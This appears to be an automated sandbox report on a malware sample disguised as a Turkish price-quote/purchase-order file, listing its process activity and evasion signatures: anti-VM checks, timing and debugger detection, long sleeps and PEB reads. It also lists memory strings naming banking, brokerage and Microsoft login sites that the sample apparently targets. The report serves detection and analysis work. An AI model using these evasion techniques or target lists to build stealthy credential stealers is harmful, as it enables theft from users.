Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe PID: 6604, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\unregmp2.exe API/Special instruction interceptor: Address: 7FF90818D324
Source: C:\Windows\SysWOW64\unregmp2.exe API/Special instruction interceptor: Address: 7FF90818D7E4
Source: C:\Windows\SysWOW64\unregmp2.exe API/Special instruction interceptor: Address: 7FF90818D944
Source: C:\Windows\SysWOW64\unregmp2.exe API/Special instruction interceptor: Address: 7FF90818D504
Source: C:\Windows\SysWOW64\unregmp2.exe API/Special instruction interceptor: Address: 7FF90818D544
Source: C:\Windows\SysWOW64\unregmp2.exe API/Special instruction interceptor: Address: 7FF90818D1E4
Source: C:\Windows\SysWOW64\unregmp2.exe API/Special instruction interceptor: Address: 7FF908190154
Source: C:\Windows\SysWOW64\unregmp2.exe API/Special instruction interceptor: Address: 7FF90818DA44
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: 11D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: 2F30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: 2E30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: 7C80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: 73B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: 8C80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: 9C80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: 9FD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: AFD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: BFD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: D2A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: E2A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: F2A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: F930000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B1096E rdtsc 7_2_01B1096E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1365 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 375 Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Window / User API: threadDelayed 503 Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Window / User API: threadDelayed 9468 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\unregmp2.exe API coverage: 2.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe TID: 6300 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7328 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764 Thread sleep count: 503 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764 Thread sleep time: -1006000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764 Thread sleep count: 9468 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764 Thread sleep time: -18936000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784 Thread sleep time: -48000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784 Thread sleep time: -48000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\unregmp2.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\unregmp2.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BDBE00 FindFirstFileW,FindNextFileW,FindClose, 9_2_00BDBE00
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 7454168B.9.dr Binary or memory string: dev.azure.comVMware20,11696497155j
Source: 7454168B.9.dr Binary or memory string: global block list test formVMware20,11696497155
Source: 7454168B.9.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: 7454168B.9.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1326636607.0000000001299000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 7454168B.9.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: 7454168B.9.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: 7454168B.9.dr Binary or memory string: tasks.office.comVMware20,11696497155o
Source: 7454168B.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: unregmp2.exe, 00000009.00000002.3778117405.000000000304A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-(
Source: owYCvHvzfwuh.exe, 0000000D.00000002.3778283010.00000000009DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: 7454168B.9.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: 7454168B.9.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: 7454168B.9.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: 7454168B.9.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: 7454168B.9.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: 7454168B.9.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: firefox.exe, 0000000E.00000002.1830885572.000001B3AEEEC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
Source: 7454168B.9.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: 7454168B.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: 7454168B.9.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1326636607.0000000001299000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 7454168B.9.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: 7454168B.9.dr Binary or memory string: AMC password management pageVMware20,11696497155
Source: 7454168B.9.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: 7454168B.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: 7454168B.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: 7454168B.9.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: 7454168B.9.dr Binary or memory string: discord.comVMware20,11696497155f
Source: 7454168B.9.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: 7454168B.9.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: 7454168B.9.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: 7454168B.9.dr Binary or memory string: outlook.office.comVMware20,11696497155s
Source: 7454168B.9.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: 7454168B.9.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: 7454168B.9.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B1096E rdtsc 7_2_01B1096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00417893 LdrLoadDll, 7_2_00417893
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5019F mov eax, dword ptr fs:[00000030h] 7_2_01B5019F
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5019F mov eax, dword ptr fs:[00000030h] 7_2_01B5019F
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5019F mov eax, dword ptr fs:[00000030h] 7_2_01B5019F
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5019F mov eax, dword ptr fs:[00000030h] 7_2_01B5019F
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B8C188 mov eax, dword ptr fs:[00000030h] 7_2_01B8C188
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B8C188 mov eax, dword ptr fs:[00000030h] 7_2_01B8C188
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B10185 mov eax, dword ptr fs:[00000030h] 7_2_01B10185
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B74180 mov eax, dword ptr fs:[00000030h] 7_2_01B74180
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B74180 mov eax, dword ptr fs:[00000030h] 7_2_01B74180
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACA197 mov eax, dword ptr fs:[00000030h] 7_2_01ACA197
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACA197 mov eax, dword ptr fs:[00000030h] 7_2_01ACA197
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACA197 mov eax, dword ptr fs:[00000030h] 7_2_01ACA197
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B001F8 mov eax, dword ptr fs:[00000030h] 7_2_01B001F8
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA61E5 mov eax, dword ptr fs:[00000030h] 7_2_01BA61E5
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E1D0 mov eax, dword ptr fs:[00000030h] 7_2_01B4E1D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E1D0 mov eax, dword ptr fs:[00000030h] 7_2_01B4E1D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E1D0 mov ecx, dword ptr fs:[00000030h] 7_2_01B4E1D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E1D0 mov eax, dword ptr fs:[00000030h] 7_2_01B4E1D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E1D0 mov eax, dword ptr fs:[00000030h] 7_2_01B4E1D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B961C3 mov eax, dword ptr fs:[00000030h] 7_2_01B961C3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B961C3 mov eax, dword ptr fs:[00000030h] 7_2_01B961C3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B00124 mov eax, dword ptr fs:[00000030h] 7_2_01B00124
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B90115 mov eax, dword ptr fs:[00000030h] 7_2_01B90115
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7A118 mov ecx, dword ptr fs:[00000030h] 7_2_01B7A118
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7A118 mov eax, dword ptr fs:[00000030h] 7_2_01B7A118
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7A118 mov eax, dword ptr fs:[00000030h] 7_2_01B7A118
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7A118 mov eax, dword ptr fs:[00000030h] 7_2_01B7A118
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h] 7_2_01B7E10E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7E10E mov ecx, dword ptr fs:[00000030h] 7_2_01B7E10E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h] 7_2_01B7E10E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h] 7_2_01B7E10E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7E10E mov ecx, dword ptr fs:[00000030h] 7_2_01B7E10E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h] 7_2_01B7E10E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h] 7_2_01B7E10E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7E10E mov ecx, dword ptr fs:[00000030h] 7_2_01B7E10E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7E10E mov eax, dword ptr fs:[00000030h] 7_2_01B7E10E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7E10E mov ecx, dword ptr fs:[00000030h] 7_2_01B7E10E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4164 mov eax, dword ptr fs:[00000030h] 7_2_01BA4164
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4164 mov eax, dword ptr fs:[00000030h] 7_2_01BA4164
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B68158 mov eax, dword ptr fs:[00000030h] 7_2_01B68158
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B64144 mov eax, dword ptr fs:[00000030h] 7_2_01B64144
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B64144 mov eax, dword ptr fs:[00000030h] 7_2_01B64144
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B64144 mov ecx, dword ptr fs:[00000030h] 7_2_01B64144
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B64144 mov eax, dword ptr fs:[00000030h] 7_2_01B64144
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B64144 mov eax, dword ptr fs:[00000030h] 7_2_01B64144
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD6154 mov eax, dword ptr fs:[00000030h] 7_2_01AD6154
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD6154 mov eax, dword ptr fs:[00000030h] 7_2_01AD6154
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACC156 mov eax, dword ptr fs:[00000030h] 7_2_01ACC156
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B960B8 mov eax, dword ptr fs:[00000030h] 7_2_01B960B8
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B960B8 mov ecx, dword ptr fs:[00000030h] 7_2_01B960B8
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AC80A0 mov eax, dword ptr fs:[00000030h] 7_2_01AC80A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B680A8 mov eax, dword ptr fs:[00000030h] 7_2_01B680A8
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD208A mov eax, dword ptr fs:[00000030h] 7_2_01AD208A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B120F0 mov ecx, dword ptr fs:[00000030h] 7_2_01B120F0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD80E9 mov eax, dword ptr fs:[00000030h] 7_2_01AD80E9
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACA0E3 mov ecx, dword ptr fs:[00000030h] 7_2_01ACA0E3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B560E0 mov eax, dword ptr fs:[00000030h] 7_2_01B560E0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACC0F0 mov eax, dword ptr fs:[00000030h] 7_2_01ACC0F0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B520DE mov eax, dword ptr fs:[00000030h] 7_2_01B520DE
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B66030 mov eax, dword ptr fs:[00000030h] 7_2_01B66030
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACA020 mov eax, dword ptr fs:[00000030h] 7_2_01ACA020
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACC020 mov eax, dword ptr fs:[00000030h] 7_2_01ACC020
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B54000 mov ecx, dword ptr fs:[00000030h] 7_2_01B54000
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h] 7_2_01B72000
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h] 7_2_01B72000
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B72000 mov eax, dword ptr fs:[00000030h] 7_2_01B72000
